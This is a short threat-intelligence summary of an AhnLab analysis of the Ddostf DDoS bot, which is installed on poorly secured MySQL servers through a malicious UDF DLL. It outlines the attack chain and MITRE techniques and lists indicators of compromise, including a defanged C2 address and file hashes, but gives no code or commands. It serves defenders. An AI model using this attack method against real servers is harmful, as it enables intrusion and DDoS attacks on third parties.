Threat Research

Ddostf DDoS Bot Malware Attacking MySQL Servers

Securonix

The AhnLab analysis describes the Ddostf DDoS bot being installed on vulnerable MySQL servers via a User-Defined Function (UDF) DLL, enabling command execution, payload download, and DDoS capability. It decrypts its C2 URL, reports basic system information to the C2 server, and uses Windows service persistence with potential new C2 addresses for DDoS-as-a-service. hashtags: #Ddostf #MySQL

Keypoints

  • Ddostf DDoS bot targets vulnerable MySQL servers and is installed via malicious UDF DLLs on infected systems.
  • Threat actors identify targets by scanning for publicly accessible 3306/TCP MySQL ports and then attempt brute-force or dictionary credential attacks, or exploit unpatched flaws.
  • MySQL does not expose xp_cmdshell, but UDF DLLs enable threat actors to execute OS commands through the MySQL server.
  • The UDF DLL can download Ddostf from an external source and execute commands, with the cmdshelv() function capable of outputting results to a cmd.tmp file for exfiltration.
  • Ddostf exists in PE (Windows) and ELF (Linux) forms; in Windows, it decrypts a C2 URL string, connects to C2, and collects basic system information to send back.
  • The bot supports six C2 commands, including starting/stopping DDoS, downloading/running payloads, and transmitting system status, plus the ability to switch to a new C2 server for continued DDoS activity.

MITRE Techniques

  • [T1046] Network Service Scanning – “scanners search for systems using the 3306/TCP port, which is used by MySQL servers.”
  • [T1110] Brute Force – “threat actors can use brute-force or dictionary attacks on the system.”
  • [T1190] Exploit Public-Facing Application – “if the system is running an unpatched version with vulnerabilities, threat actors could exploit these vulnerabilities to execute commands.”
  • [T1059] Command and Scripting Interpreter – “they can deliver malicious commands to the infected system by executing the defined commands.”
  • [T1105] Ingress Tool Transfer – “downloader() function provided by the UDF DLL to download Ddostf from an external source before executing the downloaded Ddostf.”
  • [T1543.003] Create or Modify Windows Service – “copies itself under a random name … before registering itself as a service.”
  • [T1027] Obfuscated/Compressed Files and Information – “decrypts the encrypted C&C server URL string … to obtain and connect to the actual C&C server URL.”
  • [T1105] Ingress Tool Transfer – “downloads and runs additional payload” (Table of commands shows this function in practice).

Indicators of Compromise

  • [IP] C2 address – 136.243.103[.]119:6681 – example of the C2 server URL.
  • [MD5] 6e7e26a6e237f84b51bc61aa7dff5680 – Ddostf (11188.exe).
  • [MD5] fe550baf5205d4b2503ad0d48014fccf – UDF DLL (amd.dll).
  • [File] Ddostf executable – 11188.exe referenced with MD5 above.
  • [File] UDF DLL – amd.dll referenced with MD5 above.

Read more: https://malware.news/t/ddostf-ddos-bot-malware-attacking-mysql-servers/75611

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint